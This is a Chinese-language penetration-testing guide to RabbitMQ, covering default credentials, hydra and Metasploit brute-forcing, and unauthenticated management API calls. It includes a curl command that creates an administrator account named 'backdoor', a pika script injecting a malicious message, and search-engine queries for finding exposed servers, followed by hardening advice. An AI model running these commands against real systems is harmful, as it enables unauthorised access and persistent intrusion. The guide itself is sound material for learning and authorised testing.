---
title: "5672 - Rabbitmq"
weight: 5672
date: "2026-03-09T09:23:30+08:00"
lastmod: "2026-03-10T13:26:55+08:00"
---

💡 **学习提示**: 本文档介绍 **Rabbitmq** 的渗透测试方法，适合信息安全初学者和从业人员参考。

⚠️ **法律声明**: 本文档仅供学习和授权测试使用。未经授权的系统测试可能违反法律法规。

---

> ⚠️ **法律声明**: 本文档仅供学习和授权测试使用。未经授权的系统测试可能违反法律法规。

## 服务概述

RabbitMQ 是消息队列服务。默认凭据、管理界面暴露是主要安全问题。

**默认端口**: 5672 (AMQP), 15672 (Management)  
**危害等级**: ⭐⭐⭐⭐

---

## 信息收集

### 服务识别

```bash
# nmap 扫描
nmap -sV --script http-title -p 15672 TARGET

# 访问管理界面
curl http://TARGET:15672

# 输出：
# RabbitMQ Management
```

### 默认凭据

```
guest:guest (仅本地访问)
admin:admin
administrator:administrator
```

---

## 常见攻击手法

### 1. 默认凭据

**原理**: RabbitMQ 使用默认用户名密码。

**利用**:
```bash
# 测试默认凭据
curl -u guest:guest http://TARGET:15672/api/overview

# 如果成功，返回 JSON 数据
```

### 2. 暴力破解

**利用**:
```bash
# hydra
hydra -l guest -P rockyou.txt http-get://TARGET:15672/login

# 或使用 metasploit
use auxiliary/scanner/http/rabbitmq_login
set RHOSTS TARGET
run
```

### 3. 未授权访问 (旧版本)

**原理**: 旧版本 RabbitMQ 管理界面无认证。

**利用**:
```bash
# 访问 API
curl http://TARGET:15672/api/overview

# 列出用户
curl http://TARGET:15672/api/users

# 列出队列
curl http://TARGET:15672/api/queues

# 创建用户
curl -u guest:guest -X PUT http://TARGET:15672/api/users/backdoor \
  -d '{"password":"backdoor123","tags":"administrator"}'
```

### 4. 消息注入

**原理**: 向队列发送恶意消息。

**利用**:
```python
import pika

# 连接
credentials = pika.PlainCredentials('guest', 'guest')
connection = pika.BlockingConnection(
    pika.ConnectionParameters(host='TARGET', credentials=credentials)
)
channel = connection.channel()

# 发送消息
channel.basic_publish(
    exchange='',
    routing_key='target_queue',
    body='{"cmd": "malicious_payload"}'
)
```

---

## 防御建议

```bash
# 1. 修改默认凭据
rabbitmqctl change_password guest NEW_PASSWORD

# 2. 删除 guest 用户
rabbitmqctl delete_user guest

# 3. 创建新用户
rabbitmqctl add_user admin StrongPassword123!
rabbitmqctl set_user_tags admin administrator

# 4. 网络隔离
# 不暴露公网
# 防火墙限制访问
```

---

## 参考链接

- [HackTricks - 5672-rabbitmq](https://book.hacktricks.wiki/en/network-services-pentesting/5672-rabbitmq.html)

---

---

---

### 搜索引擎语法

#### FOFA

```bash
# FOFA 搜索语法
port="5672"
```

#### Shodan

```bash
# Shodan 搜索语法
port:5672
```

#### ZoomEye

```bash
# ZoomEye 搜索语法
port:5672
```

---

## 📖 参考资料

- [HackTricks - 5672-rabbitmq](https://book.hacktricks.wiki/en/network-services-pentesting/5672-rabbitmq.html)

